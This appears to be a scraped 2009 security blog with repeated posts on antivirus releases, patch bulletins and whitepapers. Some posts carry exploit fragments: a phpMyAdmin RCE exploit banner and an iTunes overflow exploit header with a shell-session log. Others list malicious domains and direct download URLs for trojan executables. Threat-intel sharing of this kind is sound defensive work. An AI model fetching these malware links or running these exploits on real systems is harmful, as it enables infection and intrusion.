Make sure it get the latest spyware definitions.
Scanned real malicious and it works!
Customize your personal settings
Memory footprint when observed from ProcessExplorer
Friday, June 26, 2009
Microsoft Security Essentials 'Outlook' !
First view after installed Microsoft's Antivirus, it will updates the virus definition first before functions properly.
Make sure it get the latest spyware definitions.
Scanned real malicious and it works!
Customize your personal settings
Memory footprint when observed from ProcessExplorer
Make sure it get the latest spyware definitions.
Scanned real malicious and it works!
Customize your personal settings
Memory footprint when observed from ProcessExplorer
Wednesday, June 24, 2009
pmaPWN! - phpMyAdmin Code Injection RCE Scanner & Exploit
Reference: http://www.milw0rm.com/exploits/8992
................................................
1) {
print "|****************************************************************|\n";
print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";
print " This is PHP version original http://milw0rm.com/exploits/8921\n";
print " credit: Greg Ose, pagvac @ gnucitizen.org\n";
print " greetz: Hacking Expose!, HM Security, darkc0de\n";
print "|****************************************************************|\n";
print "\n";
print "Usage: php $argv[0] \n";
exit;
}
print "|****************************************************************|\n";
print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";
print " This is PHP version original http://milw0rm.com/exploits/8921\n";
print " credit: Greg Ose, pagvac @ gnucitizen.org\n";
print " greetz: Hacking Expose!, HM Security, darkc0de\n";
print "|****************************************************************|\n";
print "\n";
$Handlex = FOpen("pmaPWN.log", "a+");
FWrite($Handlex, "|****************************************************************|\n");
FWrite($Handlex, " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n");
FWrite($Handlex, " phpMyAdmin Code Injection RCE Scanner & Exploit\n");
FWrite($Handlex, " This is PHP version original http://milw0rm.com/exploits/8921\n");
FWrite($Handlex, " credit: Greg Ose, pagvac @ gnucitizen.org\n");
FWrite($Handlex, " greetz: Hacking Expose!, HM Security, darkc0de\n");
FWrite($Handlex, "|****************************************************************|\n\n");................................................
Tuesday, June 23, 2009
Microsoft Security Essentials beta version-- Free anti-malware software
Microsoft released their free antivirus "Microsoft Security Essentials" beta version today 23-June-09. It available to download from http://www.microsoft.com/security_essentials/
This product support on XP(32-bit), Vista and future Windows 7 (32-bit) and Vista and future Windows 7 (64-bit). Installation file size is 3.73MB for Vista and future Windows 7 (64-bit), 7.51MB for XP, and 4.73 for Vista and future Windows 7 (32-bit). The installer require less space compare to other security products.
Although Microsoft providing free antivirus malware, Web threats still the main threat the for the days now.
Download link:
Monday, June 22, 2009
Multiple Exploiting IE8/IE7 XSS Vulnerability
80vul security researcher disclosure some related XSS for IE7/IE8.
Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2009/06/22
References: http://www.80vul.com/ie8/Multiple%20Exploiting%20IE8IE7%20XSS%20Vulnerability.txt
........[continue]....
........[testing].......
So the results is :
---------------------------------------------------------
IE | alert
---------------------------------------------------------
ie7: xss4/xss3/xss2/xss1/xss8/xss/xss11/xss7/xss6/xss9
------------------------------------------------------
ie8: xss4/xss1/xss11/xss6
---------------------------------------------------------
Disclosure Timeline:
2009/05/01 - Found this Vulnerability
2009/06/22 - Public Disclosure
Greeting:
ycosxhack[http://hi.baidu.com/ycosxhack],Not his test,not this Vulnerability.
Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2009/06/22
References: http://www.80vul.com/ie8/Multiple%20Exploiting%20IE8IE7%20XSS%20Vulnerability.txt
........[continue]....
........[testing].......
So the results is :
---------------------------------------------------------
IE | alert
---------------------------------------------------------
ie7: xss4/xss3/xss2/xss1/xss8/xss/xss11/xss7/xss6/xss9
------------------------------------------------------
ie8: xss4/xss1/xss11/xss6
---------------------------------------------------------
Disclosure Timeline:
2009/05/01 - Found this Vulnerability
2009/06/22 - Public Disclosure
Greeting:
ycosxhack[http://hi.baidu.com/ycosxhack],Not his test,not this Vulnerability.
Sunday, June 21, 2009
Apple ITunes 8.1.1.10 PoC exploit
Apple ITunes 8.1.1.10
Reference: http://www.milw0rm.com/exploits/8934
#!/usr/bin/python
# Apple iTunes 8.1.1.10 itms/itcp BOF Windows Exploit
# www.offensive-security.com/blog/vulndev/itunes-exploitation-case-study/
# Matteo Memelli | ryujin __A-T__ offensive-security.com
# Spaghetti & Pwnsauce - 06/10/2009
# CVE-2009-0950 http://dvlabs.tippingpoint.com/advisory/TPTI-09-03
#
# Vulnerability can't be exploited simply overwriting a return address on the
# stack because of stack canary protection. Increasing buffer size leads to
# SEH overwrite but it seems that the Access Violation needed to get our own
# Exception Handler called is not always thrown.
# So, to increase reliability, the exploit sends two URI to iTunes:
# - the 1st payload corrupts the stack (it doesnt overwrite cookie, no crash)
# - the 2nd payload fully overwrite SEH to 0wN EIP
# Payloads must be encoded in order to obtain pure ASCII printable shellcode.
# I could trigger the vulnerability from Firefox but not from IE that seems
# to truncate the long URI.
# Tested on Windows XP SP2/SP3 English, Firefox 3.0.10,
# iTunes 8.1.1.10, 8.1.0.52
#
# --> hola hola ziplock, my Apple Guru! ;) && cheers to muts... he knows why
#
# ryujin:Desktop ryujin$ ./ipwn.py
# [+] iTunes 8.1.10 URI Bof Exploit Windows Version CVE-2009-0950
# [+] Matteo Memelli aka ryujin __A-T__ offensive-security.com
# [+] www.offensive-security.com
# [+] Spaghetti & Pwnsauce
# [+] Listening on port 80
# [+] Connection accepted from: 172.16.30.7
# [+] Payload sent, wait 20 secs for iTunes error!
# ryujin:Desktop ryujin$ nc -v 172.16.30.7 4444
# Connection to 172.16.30.7 4444 port [tcp/krb524] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Mozilla Firefox>
Reference: http://www.milw0rm.com/exploits/8934
Saturday, June 20, 2009
Suspicious domain lists 20-June-09
IP Address: 159.226.7.162
Suspicious domain list:
2l2l2l2.cn
aidexvqo.cn
bbs.fzlkj.cn
dp-dtudio.cn
gddltj.cn
golck.cn
gussmanntech.co.cn
qssh.cn
www.101-shop.cn
www.1x5x.cn
www.cdk1718.cn
www.cngudao.cn
www.feisui168.cn
www.foyal.cn
www.huaibb.cn
www.huatl.cn
www.jnjiayi.cn
www.k555.cn
www.onecf.cn
www.pingxiwaimao.cn
www.qeyoob.cn
www.zangh.cn
yiihoo.cn
Suspicious domain list:
2l2l2l2.cn
aidexvqo.cn
bbs.fzlkj.cn
dp-dtudio.cn
gddltj.cn
golck.cn
gussmanntech.co.cn
qssh.cn
www.101-shop.cn
www.1x5x.cn
www.cdk1718.cn
www.cngudao.cn
www.feisui168.cn
www.foyal.cn
www.huaibb.cn
www.huatl.cn
www.jnjiayi.cn
www.k555.cn
www.onecf.cn
www.pingxiwaimao.cn
www.qeyoob.cn
www.zangh.cn
yiihoo.cn
Pharmaceutic spamming in Yahoo Groups
Another spam technique revealed when they keep spamming into users yahoo accounts. Message sent from spamming engine will entice users click on the particular yahoo groups link such as " http://groups.yahoo.com/group/qahykimuqihog25/message/1 ". Users will redirect to fake websites once click on the showed page.
Suspicious rogue Domain
IP Address: 112.137.162.136
adulisan.ru
alevut.ru
anakondo4ka.ru
asoldina.ru
bumhuful.cn
buxmamoq.cn
cisoti.ru
dahoya.ru
doleyole.ru
drapindym.ru
ebenep.ru
edahoyeg.ru
ejequhos.ru
elovopaz.ru
glitemalle.ru
grendetta.ru
hicoqaze.ru
ilohaded.ru
iqegix.ru
jujegosa.ru
kamoku.ru
kodezeyi.ru
lohoxo.ru
lumade.ru
negatople.ru
newagi.ru
nikoragyas.ru
nokavaku.ru
odomecew.ru
ofovav.ru
omajun.ru
pakixomi.ru
poditoye.ru
qisdebam.cn
resukatu.ru
rosavi4ka.ru
ruguvise.ru
runosu.ru
rx-stock.com
sabrino4ka.ru
symerary.ru
ubevex.ru
ubozayuy.ru
ugofaqud.ru
uhejar.ru
uhurisuf.ru
uqikuk.ru
vahvelax.cn
vekowo.ru
wewqesot.cn
wocici.ru
www.bifdafuy.cn
www.bigmubeg.cn
www.boblifeh.cn
www.cankowiq.cn
www.caynivun.cn
www.dexqocam.cn
www.difyolov.cn
www.edihilen.ru
www.fahxovow.cn
www.fenduxom.cn
www.fepxesoj.cn
www.fihheqal.cn
www.foswahop.cn
www.gamlokuh.cn
www.garlahos.cn
www.gaxhamoq.cn
www.gesriliz.cn
www.gibmuqil.cn
www.gimjojal.cn
www.givgilar.cn
www.giykifoq.cn
www.gupvusaq.cn
www.gutqepav.cn
www.guyvesuq.cn
www.hafriqeg.cn
www.hagcekud.cn
www.haljujus.cn
www.hanqovid.cn
www.haydecil.cn
www.hecloren.cn
www.hexwafol.cn
www.hobqosuv.cn
www.hoxtaler.cn
www.hucjapof.cn
www.hukwaxoh.cn
www.huqxosev.cn
www.huvpebim.cn
www.japjenor.cn
www.jezheyay.cn
www.jezmuruf.cn
www.jinpaqur.cn
www.jitcuhul.cn
www.jivpavon.cn
www.jumraton.cn
www.kamvivag.cn
www.ketnatoj.cn
www.kihlitol.cn
www.kizkitok.cn
www.koshufih.cn
www.lafwivok.cn
www.libdifuh.cn
www.ligcudok.cn
www.loxcutot.cn
www.lozyuvos.cn
www.lucwemos.cn
www.mafdarem.cn
www.mazhoraq.cn
www.meqgiyap.cn
www.mewkofit.cn
www.mexmojem.cn
www.motvajid.cn
www.mugpucer.cn
www.muvxasuh.cn
www.newyepen.cn
www.nofguxuk.cn
www.nupvoquk.cn
www.ofopadej.ru
www.okaciq.ru
www.ovejizod.ru
www.ovewup.ru
www.paxtapaj.cn
www.pekhidib.cn
www.pemqopig.cn
www.piqfuvih.cn
www.pitvasug.cn
www.pityiruz.cn
www.qagposad.cn
www.qockuqox.cn
www.qujcumul.cn
www.qusmameh.cn
www.rotcoziq.cn
www.ruhtecuf.cn
www.rukdutuk.cn
www.ruytohod.cn
www.sabhufaf.cn
www.salxamuv.cn
www.satqadek.cn
www.sebqotaz.cn
www.sigduzef.cn
www.sipsuliy.cn
www.sixtagoy.cn
www.sorfecow.cn
www.sulboqow.cn
www.tatiano4ke.ru
www.telguhed.cn
www.tiffelad.cn
www.tillibus.cn
www.titqesay.cn
www.tuhcaqud.cn
www.ugubif.ru
www.vapzimar.cn
www.vebjikol.cn
www.vermotan.cn
www.vizrador.cn
www.vowkomag.cn
www.vuddijuf.cn
www.vugbonic.cn
www.wozcinin.cn
www.xaggosap.cn
www.xewcusep.cn
www.xilxasin.cn
www.xorkiceb.cn
www.xozhemih.cn
www.xugregek.cn
www.yitlediq.cn
www.yoddoqof.cn
www.yucsozur.cn
www.yuvwoxig.cn
www.zalkemis.cn
www.zarlobim.cn
www.zicpestx.cn
www.ziqlivid.cn
www.zitfanef.cn
www.zitqezap.cn
www.zivliwup.cn
xesanu.ru
yocuhe.ru
zatufive.ru
zexakode.ru
Note:If you think the information benefit to you, click on advertisement to support me for domain fees.
Suspicious rogue Domain
IP Address: 112.137.162.136
adulisan.ru
alevut.ru
anakondo4ka.ru
asoldina.ru
bumhuful.cn
buxmamoq.cn
cisoti.ru
dahoya.ru
doleyole.ru
drapindym.ru
ebenep.ru
edahoyeg.ru
ejequhos.ru
elovopaz.ru
glitemalle.ru
grendetta.ru
hicoqaze.ru
ilohaded.ru
iqegix.ru
jujegosa.ru
kamoku.ru
kodezeyi.ru
lohoxo.ru
lumade.ru
negatople.ru
newagi.ru
nikoragyas.ru
nokavaku.ru
odomecew.ru
ofovav.ru
omajun.ru
pakixomi.ru
poditoye.ru
qisdebam.cn
resukatu.ru
rosavi4ka.ru
ruguvise.ru
runosu.ru
rx-stock.com
sabrino4ka.ru
symerary.ru
ubevex.ru
ubozayuy.ru
ugofaqud.ru
uhejar.ru
uhurisuf.ru
uqikuk.ru
vahvelax.cn
vekowo.ru
wewqesot.cn
wocici.ru
www.bifdafuy.cn
www.bigmubeg.cn
www.boblifeh.cn
www.cankowiq.cn
www.caynivun.cn
www.dexqocam.cn
www.difyolov.cn
www.edihilen.ru
www.fahxovow.cn
www.fenduxom.cn
www.fepxesoj.cn
www.fihheqal.cn
www.foswahop.cn
www.gamlokuh.cn
www.garlahos.cn
www.gaxhamoq.cn
www.gesriliz.cn
www.gibmuqil.cn
www.gimjojal.cn
www.givgilar.cn
www.giykifoq.cn
www.gupvusaq.cn
www.gutqepav.cn
www.guyvesuq.cn
www.hafriqeg.cn
www.hagcekud.cn
www.haljujus.cn
www.hanqovid.cn
www.haydecil.cn
www.hecloren.cn
www.hexwafol.cn
www.hobqosuv.cn
www.hoxtaler.cn
www.hucjapof.cn
www.hukwaxoh.cn
www.huqxosev.cn
www.huvpebim.cn
www.japjenor.cn
www.jezheyay.cn
www.jezmuruf.cn
www.jinpaqur.cn
www.jitcuhul.cn
www.jivpavon.cn
www.jumraton.cn
www.kamvivag.cn
www.ketnatoj.cn
www.kihlitol.cn
www.kizkitok.cn
www.koshufih.cn
www.lafwivok.cn
www.libdifuh.cn
www.ligcudok.cn
www.loxcutot.cn
www.lozyuvos.cn
www.lucwemos.cn
www.mafdarem.cn
www.mazhoraq.cn
www.meqgiyap.cn
www.mewkofit.cn
www.mexmojem.cn
www.motvajid.cn
www.mugpucer.cn
www.muvxasuh.cn
www.newyepen.cn
www.nofguxuk.cn
www.nupvoquk.cn
www.ofopadej.ru
www.okaciq.ru
www.ovejizod.ru
www.ovewup.ru
www.paxtapaj.cn
www.pekhidib.cn
www.pemqopig.cn
www.piqfuvih.cn
www.pitvasug.cn
www.pityiruz.cn
www.qagposad.cn
www.qockuqox.cn
www.qujcumul.cn
www.qusmameh.cn
www.rotcoziq.cn
www.ruhtecuf.cn
www.rukdutuk.cn
www.ruytohod.cn
www.sabhufaf.cn
www.salxamuv.cn
www.satqadek.cn
www.sebqotaz.cn
www.sigduzef.cn
www.sipsuliy.cn
www.sixtagoy.cn
www.sorfecow.cn
www.sulboqow.cn
www.tatiano4ke.ru
www.telguhed.cn
www.tiffelad.cn
www.tillibus.cn
www.titqesay.cn
www.tuhcaqud.cn
www.ugubif.ru
www.vapzimar.cn
www.vebjikol.cn
www.vermotan.cn
www.vizrador.cn
www.vowkomag.cn
www.vuddijuf.cn
www.vugbonic.cn
www.wozcinin.cn
www.xaggosap.cn
www.xewcusep.cn
www.xilxasin.cn
www.xorkiceb.cn
www.xozhemih.cn
www.xugregek.cn
www.yitlediq.cn
www.yoddoqof.cn
www.yucsozur.cn
www.yuvwoxig.cn
www.zalkemis.cn
www.zarlobim.cn
www.zicpestx.cn
www.ziqlivid.cn
www.zitfanef.cn
www.zitqezap.cn
www.zivliwup.cn
xesanu.ru
yocuhe.ru
zatufive.ru
zexakode.ru
Note:If you think the information benefit to you, click on advertisement to support me for domain fees.
Thursday, June 11, 2009
Malicious URLs * 11-June-09*
Malicious link
Domain: 216.226.131.77/
Level 1: http://216.226.131.77/seraph/door/news/index.htm
Level 2: http://216.226.131.77/seraph/door/news/flash.htm
Level 3: http://216.226.131.77/seraph/door/news/iss.html
Level 4: http://216.226.131.77/seraph/door/news/swfobject.js
Level 4: http://js.tongji.linezing.com/930456/tongji.js
Level 4: http://img.tongji.linezing.com/930456/tongji.gif
Level 4: http://216.226.131.77/seraph/door/news/i16.swf
Level 4: http://216.226.131.77/seraph/door/news/i28.swf
Level 4: http://216.226.131.77/seraph/door/news/i45.swf
Level 4: http://216.226.131.77/seraph/door/news/i47.swf
Level 4: http://216.226.131.77/seraph/door/news/i64.swf
Level 4: http://216.226.131.77/seraph/door/news/i115.swf
Level 3: http://216.226.131.77/seraph/door/news/fss.html
Level 4: http://216.226.131.77/seraph/door/news/swfobject.js
Level 4: http://js.tongji.linezing.com/930456/tongji.js
Level 4: http://img.tongji.linezing.com/930456/tongji.gif
Level 4: http://216.226.131.77/seraph/door/news/i16.swf
Level 4: http://216.226.131.77/seraph/door/news/i28.swf
Level 4: http://216.226.131.77/seraph/door/news/i45.swf
Level 4: http://216.226.131.77/seraph/door/news/i47.swf
Level 4: http://216.226.131.77/seraph/door/news/i64.swf
Level 4: http://216.226.131.77/seraph/door/news/i115.swf
Level 2: http://216.226.131.77/seraph/door/news/a4.htm
Level 3: http://216.226.131.77/seraph/door/news/14.js
Level 4: (Trojan) http://209.162.188.225/calcs.exe
Level 2: http://216.226.131.77/seraph/door/news/office.htm
Level 3: http://216.226.131.77/seraph/door/news/of.js
Level 4: (Trojan) http://209.162.188.225/calcs.exe
Level 2: http://216.226.131.77/seraph/door/news/02.htm
Level 3: http://216.226.131.77/seraph/door/news/set.js
Level 2: http://216.226.131.77/seraph/door/news/pef.pdf
Trojan file was submitted to VirusTotal for analysis.
Domain: *cv9u.cn/
Level 1: http://www.cv9i.cn/index.htm
Level 2: http://www.cv9i.cn/flash.htm
Level 3: http://www.cv9i.cn/iss.html
Level 4: http://www.cv9i.cn/swfobject.js
Level 4: http://www.cv9i.cn/i16.swf
Level 4: http://www.cv9i.cn/i28.swf
Level 4: http://www.cv9i.cn/i45.swf
Level 4: http://www.cv9i.cn/i47.swf
Level 4: http://www.cv9i.cn/i64.swf
Level 4: http://www.cv9i.cn/i115.swf
Level 3: http://www.cv9i.cn/fss.html
Level 4: http://www.cv9i.cn/swfobject.js
Level 4: http://www.cv9i.cn/i16.swf
Level 4: http://www.cv9i.cn/i28.swf
Level 4: http://www.cv9i.cn/i45.swf
Level 4: http://www.cv9i.cn/i47.swf
Level 4: http://www.cv9i.cn/i64.swf
Level 4: http://www.cv9i.cn/i115.swf
Level 2: http://www.cv9i.cn/a4.htm
Level 3: http://www.cv9i.cn/14.js
Level 4: http://www.cxi7.cn/t.exe
Level 2: http://www.cv9i.cn/office.htm
Level 3: http://www.cv9i.cn/of.js
Level 4: http://www.cxi7.cn/t.exe
Level 2: http://www.cv9i.cn/02.htm
Level 3: http://www.cv9i.cn/set.js
Level 2: http://www.cv9i.cn/pef.pdf
Malicious file was submitted to VirusTotal for analysis.
Disclaimer:
Whatever url links that posted above contain malicious files/trojan/virus that could harm your systems and information be stolen;Usage:URL links that posted only used for IT security officers, researchers and personal collection only. Any farmful actions totally prohibited. Used it with your own risks and wisely. Whatever risks, and consequences is totally out from to this web owner responsibility.
Domain: 216.226.131.77/
Level 1: http://216.226.131.77/seraph/door/news/index.htm
Level 2: http://216.226.131.77/seraph/door/news/flash.htm
Level 3: http://216.226.131.77/seraph/door/news/iss.html
Level 4: http://216.226.131.77/seraph/door/news/swfobject.js
Level 4: http://js.tongji.linezing.com/930456/tongji.js
Level 4: http://img.tongji.linezing.com/930456/tongji.gif
Level 4: http://216.226.131.77/seraph/door/news/i16.swf
Level 4: http://216.226.131.77/seraph/door/news/i28.swf
Level 4: http://216.226.131.77/seraph/door/news/i45.swf
Level 4: http://216.226.131.77/seraph/door/news/i47.swf
Level 4: http://216.226.131.77/seraph/door/news/i64.swf
Level 4: http://216.226.131.77/seraph/door/news/i115.swf
Level 3: http://216.226.131.77/seraph/door/news/fss.html
Level 4: http://216.226.131.77/seraph/door/news/swfobject.js
Level 4: http://js.tongji.linezing.com/930456/tongji.js
Level 4: http://img.tongji.linezing.com/930456/tongji.gif
Level 4: http://216.226.131.77/seraph/door/news/i16.swf
Level 4: http://216.226.131.77/seraph/door/news/i28.swf
Level 4: http://216.226.131.77/seraph/door/news/i45.swf
Level 4: http://216.226.131.77/seraph/door/news/i47.swf
Level 4: http://216.226.131.77/seraph/door/news/i64.swf
Level 4: http://216.226.131.77/seraph/door/news/i115.swf
Level 2: http://216.226.131.77/seraph/door/news/a4.htm
Level 3: http://216.226.131.77/seraph/door/news/14.js
Level 4: (Trojan) http://209.162.188.225/calcs.exe
Level 2: http://216.226.131.77/seraph/door/news/office.htm
Level 3: http://216.226.131.77/seraph/door/news/of.js
Level 4: (Trojan) http://209.162.188.225/calcs.exe
Level 2: http://216.226.131.77/seraph/door/news/02.htm
Level 3: http://216.226.131.77/seraph/door/news/set.js
Level 2: http://216.226.131.77/seraph/door/news/pef.pdf
Trojan file was submitted to VirusTotal for analysis.
Domain: *cv9u.cn/
Level 1: http://www.cv9i.cn/index.htm
Level 2: http://www.cv9i.cn/flash.htm
Level 3: http://www.cv9i.cn/iss.html
Level 4: http://www.cv9i.cn/swfobject.js
Level 4: http://www.cv9i.cn/i16.swf
Level 4: http://www.cv9i.cn/i28.swf
Level 4: http://www.cv9i.cn/i45.swf
Level 4: http://www.cv9i.cn/i47.swf
Level 4: http://www.cv9i.cn/i64.swf
Level 4: http://www.cv9i.cn/i115.swf
Level 3: http://www.cv9i.cn/fss.html
Level 4: http://www.cv9i.cn/swfobject.js
Level 4: http://www.cv9i.cn/i16.swf
Level 4: http://www.cv9i.cn/i28.swf
Level 4: http://www.cv9i.cn/i45.swf
Level 4: http://www.cv9i.cn/i47.swf
Level 4: http://www.cv9i.cn/i64.swf
Level 4: http://www.cv9i.cn/i115.swf
Level 2: http://www.cv9i.cn/a4.htm
Level 3: http://www.cv9i.cn/14.js
Level 4: http://www.cxi7.cn/t.exe
Level 2: http://www.cv9i.cn/office.htm
Level 3: http://www.cv9i.cn/of.js
Level 4: http://www.cxi7.cn/t.exe
Level 2: http://www.cv9i.cn/02.htm
Level 3: http://www.cv9i.cn/set.js
Level 2: http://www.cv9i.cn/pef.pdf
Malicious file was submitted to VirusTotal for analysis.
Disclaimer:
Whatever url links that posted above contain malicious files/trojan/virus that could harm your systems and information be stolen;Usage:URL links that posted only used for IT security officers, researchers and personal collection only. Any farmful actions totally prohibited. Used it with your own risks and wisely. Whatever risks, and consequences is totally out from to this web owner responsibility.
McAfee whitepaper on browser attacks
Frankly to say, I love McAfee so much. They are one of the giant security vendor that frequently published so many whitepaper recently. The document is very informative for the current security threat and trend. It also give me lots of inspiration how the security so important to our security life.
Web Browsers: An Emerging Platform Under Attack
“The widespread use of highly interactive “rich client” web applications for e-commerce, business networking, and online collaboration has finally catapulted web browsers from straightforward HTML viewers to a full-blown software platform. And as corporate users are performing a significant portion of their work on the web, whether it’s researching or collaborating, the safety of the underlying platform is critical to the company’s success. ”
Other areas the paper covers include:
• The shift in spam to mainly malicious web link usage
• “Web 2.0” sites—whether weblogs, social networking or portal sites—are increasingly spammed with links to malicious sites
• Legitimate sites are compromised and misused to either host malicious code or link to a malicious website
• Use of malicious video banners placed in advertisement networks
• Use of popular search terms to advertise and drive (search query) traffic to a malicious website. In a recent case in Germany, attackers used Google AdWords to attract users who searched for “flash player” to the attacker’s fake Adobe-look-alike site
If you wondering where can download the whitepaper, you can get entirely from http://www.mcafee.com/us/threat_center/white_paper.html
P/S: I am not work for McAfee, just say something based on my personal judgement.
Wednesday, June 10, 2009
Microsoft'sTuesday released 10 Patches in June 2009
Microsoft released their Tuesday's patches recently by addressing 32 vulnerabilities with 10 security bulletins include six "critical", three "important" and one "moderate". However, DirectShow patch not included for this cycle released.
Bulletin:
MS09-018 --Vulnerabilities in Active Directory Could Allow Remote Code Execution (971055)
MS09-022 --Vulnerabilities in Windows Print Spooler Could Allow Remote Code Execution (961501)
MS09-019 --Cumulative Security Update for Internet Explorer (969897)
MS09-027 --Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (969514)
MS09-021 --Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (969462)
MS09-024 --Vulnerability in Microsoft Works Converters Could Allow Remote Code Execution (957632)
MS09-026 --Vulnerability in RPC Could Allow Elevation of Privilege (970238)
MS09-025 --Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (968537)
MS09-020 --Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483)
MS09-023 --Vulnerability in Windows Search Could Allow Information Disclosure (963093)
Lots of exploits website will be available soon to targets systems that not to latest patches especially MS09-019. Be ready for another cyber combat for security researchers and analysts !
Reference:
http://www.microsoft.com/technet/security/bulletin/ms09-jun.mspx
Bulletin:
MS09-018 --Vulnerabilities in Active Directory Could Allow Remote Code Execution (971055)
MS09-022 --Vulnerabilities in Windows Print Spooler Could Allow Remote Code Execution (961501)
MS09-019 --Cumulative Security Update for Internet Explorer (969897)
MS09-027 --Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (969514)
MS09-021 --Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (969462)
MS09-024 --Vulnerability in Microsoft Works Converters Could Allow Remote Code Execution (957632)
MS09-026 --Vulnerability in RPC Could Allow Elevation of Privilege (970238)
MS09-025 --Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (968537)
MS09-020 --Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483)
MS09-023 --Vulnerability in Windows Search Could Allow Information Disclosure (963093)
Lots of exploits website will be available soon to targets systems that not to latest patches especially MS09-019. Be ready for another cyber combat for security researchers and analysts !
Reference:
http://www.microsoft.com/technet/security/bulletin/ms09-jun.mspx
Malicious URLs * 10-June-09*
IP Address:
60.191.239.162
203.93.208.86
58.17.3.41
Domain lists:
agnes.gejzozoy.cn
agnes.gulrulah.cn
aileen.seqwipul.cn
alma.virrotip.cn
audrey.fiqruxem.cn
audrey.maypopuc.cn
hubnayeq.cn
qcyt.daxzegef.cn
qxieaq.olesej.ru
vyvqw.mimsijix.cn
www.supegirl.ru
www.tumnemom.cn
www.wumsativ.cn
www.zocdixup.cn
opqt.lelwatiq.cn
yx.yenseloz.cn
aljfqj.ciptikuh.cn
qcyt.daxzegef.cn
60.191.239.162
203.93.208.86
58.17.3.41
Domain lists:
agnes.gejzozoy.cn
agnes.gulrulah.cn
aileen.seqwipul.cn
alma.virrotip.cn
audrey.fiqruxem.cn
audrey.maypopuc.cn
hubnayeq.cn
qcyt.daxzegef.cn
qxieaq.olesej.ru
vyvqw.mimsijix.cn
www.supegirl.ru
www.tumnemom.cn
www.wumsativ.cn
www.zocdixup.cn
opqt.lelwatiq.cn
yx.yenseloz.cn
aljfqj.ciptikuh.cn
qcyt.daxzegef.cn
The Web's Most Dangerous Search Terms
Do you ever think that what is the most dangerous keywords used when searching using search engine. Most of the dangerous keywords can lead you to websites that could harm your systems.
The phrases could be "Lyrics, myspace, free music downloads, game cheats, web, Olympics......"
Security provider McAfee did an excellent research on publishing whitepaper "The Web's Most Dangerous Search Terms". As general users, it will be good reading material to improve security awareness before using any search engines. This document will be good material for dark side force as reference when hosting any websites in Internet. This McAfee's material will provide them good statistic reports what categories they should focus on to increase the attack rate.
Reference:
1. http://us.mcafee.com/en-us/local/docs/most_dangerous_searchterm_us.pdf
2. http://blogs.zdnet.com/security/?p=3457
The phrases could be "Lyrics, myspace, free music downloads, game cheats, web, Olympics......"
Security provider McAfee did an excellent research on publishing whitepaper "The Web's Most Dangerous Search Terms". As general users, it will be good reading material to improve security awareness before using any search engines. This document will be good material for dark side force as reference when hosting any websites in Internet. This McAfee's material will provide them good statistic reports what categories they should focus on to increase the attack rate.
Reference:
1. http://us.mcafee.com/en-us/local/docs/most_dangerous_searchterm_us.pdf
2. http://blogs.zdnet.com/security/?p=3457
PhpAdmin PHP Code Injection RCE PoC
An attacker can exploit this vulnerability to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.
Reference:
1. http://www.securityfocus.com/bid/34236/discuss
2. http://www.milw0rm.com/exploits/8921
3. http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
4. http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/
5. http://www.gnucitizen.org/blog/cve-2009-1151-phpmyadmin-remote-code-execution-proof-of-concept/
Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.
Reference:
1. http://www.securityfocus.com/bid/34236/discuss
2. http://www.milw0rm.com/exploits/8921
3. http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
4. http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/
5. http://www.gnucitizen.org/blog/cve-2009-1151-phpmyadmin-remote-code-execution-proof-of-concept/
Tuesday, June 9, 2009
Penetration: from application down to OS. Getting OS access using Oracle Database unprivileged user
Digital Security Research Group published their whitepaper regarding penetration on Oracle database.
Reference: http://dsecrg.com/pages/pub/show.php?id=17
Introduction:
Once upon a time during a penetration test of corporate network I got a unprivileged account on Oracle Database and my plan was to get administrative shell on server where its database was installed. Server was running Windows 2003 server operation system and Oracle database was running with privileges of Administrator (not LOCAL_SYSTEM) account. It is a quite common situation, though. Default way is to escalate privileges on database using one of the latest SQL Injection vulnerabilities and then using DBA privileges to gain access to OS using one of the popular methods such as ExtProc, Java, extjob etc. [1] So it seems to be quite simple and I thought about another ways. What if database is patched with latest CPU updates and additionally it has some kind of Intrusion Detection System which can find 0-day vulnerabilities or something like this and it is impossible to escalate privileges using SQL Injections. Of course there are some methods of escalating privileges without exploits. For example: find cleartext passwords in database or connect to listener internally and rewrite log file or escalate privileges using some dangerous roles such as ‘SELECT ANY DICTIONARY’, ‘CREATE ANY TRIGGER’ or something like this. But this methods can’t give you 100% success. I guess there must be another way maybe not universal but better then described.
In short, this paper describes investigations to get administrative shell on server having unprivileged rights on Oracle Database......
Reference: http://dsecrg.com/pages/pub/show.php?id=17
Introduction:
Once upon a time during a penetration test of corporate network I got a unprivileged account on Oracle Database and my plan was to get administrative shell on server where its database was installed. Server was running Windows 2003 server operation system and Oracle database was running with privileges of Administrator (not LOCAL_SYSTEM) account. It is a quite common situation, though. Default way is to escalate privileges on database using one of the latest SQL Injection vulnerabilities and then using DBA privileges to gain access to OS using one of the popular methods such as ExtProc, Java, extjob etc. [1] So it seems to be quite simple and I thought about another ways. What if database is patched with latest CPU updates and additionally it has some kind of Intrusion Detection System which can find 0-day vulnerabilities or something like this and it is impossible to escalate privileges using SQL Injections. Of course there are some methods of escalating privileges without exploits. For example: find cleartext passwords in database or connect to listener internally and rewrite log file or escalate privileges using some dangerous roles such as ‘SELECT ANY 